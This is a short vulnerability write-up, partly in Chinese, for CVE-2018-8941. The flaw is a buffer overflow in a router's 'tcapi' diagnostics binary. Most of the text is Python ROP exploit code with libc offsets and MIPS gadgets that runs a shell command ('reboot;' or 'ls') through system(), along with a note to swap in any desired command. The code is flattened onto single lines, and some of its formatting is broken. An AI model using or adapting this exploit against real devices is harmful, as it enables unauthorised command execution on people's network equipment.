Adam Simuntis :: https://twitter.com/adamsimuntis
Mindaugas Slusnys :: https://twitter.com/mislusnys
The buffer overflow vulnerability was found in the "/userfs/bin/tcapi" binary which is used as a wrapper for the "Diagnostics" functionality in the Web GUI.
An authenticated user can pass a long buffer as an 'Addr' parameter to the '/user/bin/tcapi' binary using 'set Diagnostics_Entry' function and cause the memory corruption. Furthermore, it is possible to redirect the flow of the program and execute an arbitrary code.
漏洞poc #
https://github.com/SECFORCE/CVE-2018-8941
执行 执行'system("reboot;")' 如下
import struct # since we are exploiting through the WEB GUI, binary process mappings (/proc/`pidof boa`/maps) were obtained from '/userfs/bin/boa' binary libc_base = 0x2b02b000 # 0x59bb0, offset to system(), big endian libc_system = struct.pack(">I",libc_base+0x59bb0) rop_pad = 'A'*580 # 3rd: Jump to system() from libC, $a0 contains argument s0 = libc_system # 2nd: Load stored command from $a1 to $a0 then jump to next gadget at $s0 -> system(cmd) #.text:00041980 move $a0, $a1 #.text:00041984 li $a2, 0xC #.text:00041988 move $t9, $s0 #.text:0004198C jalr $t9 ; memset s1 = struct.pack(">I",libc_base+0x41980) s2 = 'BBBB' s3 = 'CCCC' # 1st: Load command stored on the stack at ($sp+0x168) to $a1 then jump to next gadget at $s1 ^ #.text:0000C654 addiu $a1, $sp, 0x168+var_150 #.text:0000C658 move $t9, $s1 #.text:0000C65C jalr $t9 ; stat64 ra = struct.pack(">I",libc_base+0xC654) payload = rop_pad + s0 + s1 + s2 + s3 + ra + "reboot;"*10
修改payload 替换想要执行的命令即可
payload = rop_pad + s0 + s1 + s2 + s3 + ra + "reboot;"*10
POC2 待验证
#ls命令 #!/usr/bin/envpython import sys import struct libc =0x40868000 s0=struct.pack(">I",0x408C1BB0)#system s1=struct.pack(">I",0x41414141)#useless s2=struct.pack(">I",0x43434343)#useless s3=struct.pack(">I",0x44444444)#useless ra=struct.pack(">I",0x4087E56C)#godget1 x="A"*580+s0+s1+s2+s3+ra+"x"*16+"ls"